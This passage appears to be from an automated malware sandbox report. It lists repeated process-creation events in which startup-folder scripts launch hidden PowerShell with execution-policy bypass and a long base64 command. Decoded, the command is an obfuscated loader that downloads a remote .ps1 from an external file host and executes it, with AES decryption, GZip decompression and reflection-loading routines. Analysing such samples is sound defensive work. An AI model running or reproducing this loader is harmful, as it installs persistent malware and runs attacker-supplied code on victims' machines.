FCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9de4acd0.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a71a70f4.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_69a99999.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_3f24aa5d.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0F
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a0b1d30.cmd"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFy